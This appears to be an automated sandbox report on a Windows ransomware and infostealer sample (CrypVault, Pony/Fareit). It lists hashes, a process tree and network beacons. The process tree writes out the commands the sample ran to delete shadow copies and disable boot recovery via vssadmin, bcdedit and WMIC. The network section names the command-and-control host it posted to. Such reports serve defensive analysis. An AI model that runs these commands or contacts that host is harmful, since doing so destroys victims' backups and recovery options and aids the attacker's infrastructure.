Analysis

  • max time kernel: 120s
  • max time network: 121s
  • platform: windows7_x64
  • resource: win7v20210410
  • submitted: 08/05/2021, 13:01 UTC

General

  • Target: AADDE71205336CCDD048F0B5029BECBBCD03E741045F4.exe
  • Size: 444KB
  • MD5: fd442753c3895d868eed72f7854e2fba
  • SHA1: 477dc12f213dd05a15b61207926b478d3a0d04c7
  • SHA256: aadde71205336ccdd048f0b5029becbbcd03e741045f406b2fa819b909809202
  • SHA512: 1a7ff91196019abe9dfa93bfaca299ecd87693ef173560951b4d55f9d0c66355535bef724de26865205419e7638e57c762e332d7eff85187e9695f0a92e1d0c2

Malware Config

Signatures

  • CrypVault
    Ransomware family which makes encrypted files look like they have been quarantined by AV.
  • Pony, Fareit
    Pony is a Remote Access Trojan application that steals information.
  • Process spawned unexpected child process (1 IoC)
    This typically indicates the parent process was compromised via an exploit or macro.
  • Deletes shadow copies (2 TTPs)
    Ransomware often targets backup files to inhibit system recovery.
  • Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  • Executes dropped EXE (3 IoCs)
  • UPX packed file (2 IoCs)
    Detects executables packed with UPX/modified UPX open source packer.
  • Drops startup file (2 IoCs)
  • Loads dropped DLL (5 IoCs)
  • Reads user/profile data of web browsers (2 TTPs)
    Infostealers often target stored browser data, which can include saved credentials etc.
  • Checks installed software on the system (1 TTP)
    Looks up Uninstall key entries in the registry to enumerate software on the system.
  • Suspicious use of SetThreadContext (1 IoC)
  • Drops file in Windows directory (1 IoC)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Office loads VBA resources, possible macro or embedded object present
  • Interacts with shadow copies (2 TTPs, 1 IoC)
    Shadow copies are often targeted by ransomware to inhibit system recovery.
  • Modifies Internet Explorer settings (1 TTP, 10 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of SetWindowsHookEx (18 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\AADDE71205336CCDD048F0B5029BECBBCD03E741045F4.exe (PID 1088)
    Command: "C:\Users\Admin\AppData\Local\Temp\AADDE71205336CCDD048F0B5029BECBBCD03E741045F4.exe"
    Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    • C:\Windows\SysWOW64\cmd.exe (PID 1704)
      Command: "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
    • C:\Windows\SysWOW64\cmd.exe (PID 608)
      Command: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\CF8C8F" 7za.exe
    • C:\Windows\SysWOW64\cmd.exe (PID 1652)
      Command: "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
    • C:\Users\Admin\AppData\Local\Temp\7za.exe (PID 1688)
      Command: "C:\Users\Admin\AppData\Local\Temp\7za.exe" e "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D" -y -p2D4F861D8D
      Signatures: Executes dropped EXE
    • C:\Windows\SysWOW64\cmd.exe (PID 1312)
      Command: "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 384)
      Command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.doc"
      Signatures: Drops file in Windows directory; Modifies Internet Explorer settings; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx
    • C:\Windows\SysWOW64\cmd.exe (PID 616)
      Command: "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
    • C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe (PID 1476)
      Command: "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe"
      Signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
      • C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe (PID 1728)
        Command: "C:\Users\Admin\AppData\Local\Temp\2D4F861D8D.exe"
        Signatures: Executes dropped EXE; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        • C:\Windows\SysWOW64\mshta.exe (PID 1592)
          Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\VAULT.hta"
          Signatures: Modifies Internet Explorer settings
        • C:\Windows\SysWOW64\wbem\WMIC.exe (PID 324)
          Command: "C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
          Signatures: Suspicious use of AdjustPrivilegeToken
    • C:\Windows\SysWOW64\cmd.exe (PID 816)
      Command: "C:\Windows\System32\cmd.exe" /c echo 2D4F861D8DCF8C8F
  • C:\Windows\system32\cmd.exe (PID 1080)
    Command: cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    • C:\Windows\system32\vssadmin.exe (PID 1476)
      Command: vssadmin.exe delete shadows /all /quiet
      Signatures: Loads dropped DLL; Suspicious use of SetThreadContext; Interacts with shadow copies; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    • C:\Windows\system32\bcdedit.exe (PID 988)
      Command: bcdedit.exe /set {default} recoveryenabled no
      Signatures: Modifies boot configuration data using bcdedit
    • C:\Windows\system32\bcdedit.exe (PID 212)
      Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      Signatures: Modifies boot configuration data using bcdedit
  • C:\Windows\system32\vssvc.exe (PID 1328)
    Command: C:\Windows\system32\vssvc.exe
    Signatures: Suspicious use of AdjustPrivilegeToken

Network

  • DNS oknoff52.ru (process: 2D4F861D8D.exe), remote address 8.8.8.8:53
    Request: oknoff52.ru IN A
    Response: oknoff52.ru IN A 87.236.16.148

  • POST http://oknoff52.ru/api/ (process: 2D4F861D8D.exe), remote address 87.236.16.148:80
    Request:
      POST /api/ HTTP/1.0
      Host: oknoff52.ru
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Accept-Language: en-US
      Content-Length: 328
      Content-Type: application/octet-stream
      Connection: close
      Content-Encoding: binary
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Response:
      HTTP/1.1 404 Not Found
      Server: nginx-reuseport/1.13.4
      Date: Sat, 08 May 2021 13:01:35 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 277
      Connection: close
      Vary: Accept-Encoding

  • POST http://oknoff52.ru/api/ (process: 2D4F861D8D.exe), remote address 87.236.16.148:80
    Request:
      POST /api/ HTTP/1.0
      Host: oknoff52.ru
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Accept-Language: en-US
      Content-Length: 328
      Content-Type: application/octet-stream
      Connection: close
      Content-Encoding: binary
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Response:
      HTTP/1.1 404 Not Found
      Server: nginx-reuseport/1.13.4
      Date: Sat, 08 May 2021 13:01:40 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 277
      Connection: close
      Vary: Accept-Encoding

  • POST http://oknoff52.ru/api/ (process: 2D4F861D8D.exe), remote address 87.236.16.148:80
    Request:
      POST /api/ HTTP/1.0
      Host: oknoff52.ru
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Accept-Language: en-US
      Content-Length: 328
      Content-Type: application/octet-stream
      Connection: close
      Content-Encoding: binary
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Response:
      HTTP/1.1 404 Not Found
      Server: nginx-reuseport/1.13.4
      Date: Sat, 08 May 2021 13:01:46 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 277
      Connection: close
      Vary: Accept-Encoding

  • POST http://oknoff52.ru/api/ (process: 2D4F861D8D.exe), remote address 87.236.16.148:80
    Request:
      POST /api/ HTTP/1.0
      Host: oknoff52.ru
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Accept-Language: en-US
      Content-Length: 328
      Content-Type: application/octet-stream
      Connection: close
      Content-Encoding: binary
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Response:
      HTTP/1.1 404 Not Found
      Server: nginx-reuseport/1.13.4
      Date: Sat, 08 May 2021 13:01:51 GMT
      Content-Type: text/html; charset=iso-8859-1
      Content-Length: 277
      Connection: close
      Vary: Accept-Encoding

  • 87.236.16.148:80 | http://oknoff52.ru/api/ | http | 2D4F861D8D.exe | 1.0kB | 732 B | 6 | 6
    HTTP Request: POST http://oknoff52.ru/api/
    HTTP Response: 404
  • 8.8.8.8:53 | oknoff52.ru | dns | 2D4F861D8D.exe | 57 B | 73 B | 1 | 1
    DNS Request: oknoff52.ru
    DNS Response: 87.236.16.148

MITRE ATT&CK Enterprise v6

Downloads

  • memory/384-78-0x00000000716F1000-0x00000000716F4000-memory.dmp (12KB)
  • memory/384-79-0x000000006F171000-0x000000006F173000-memory.dmp (8KB)
  • memory/384-80-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  • memory/1088-59-0x0000000075281000-0x0000000075283000-memory.dmp (8KB)
  • memory/1476-88-0x0000000000380000-0x0000000000385000-memory.dmp (20KB)
  • memory/1728-89-0x0000000000400000-0x000000000041A000-memory.dmp (104KB)
  • memory/1728-84-0x0000000000400000-0x0000000000E28000-memory.dmp (10.2MB)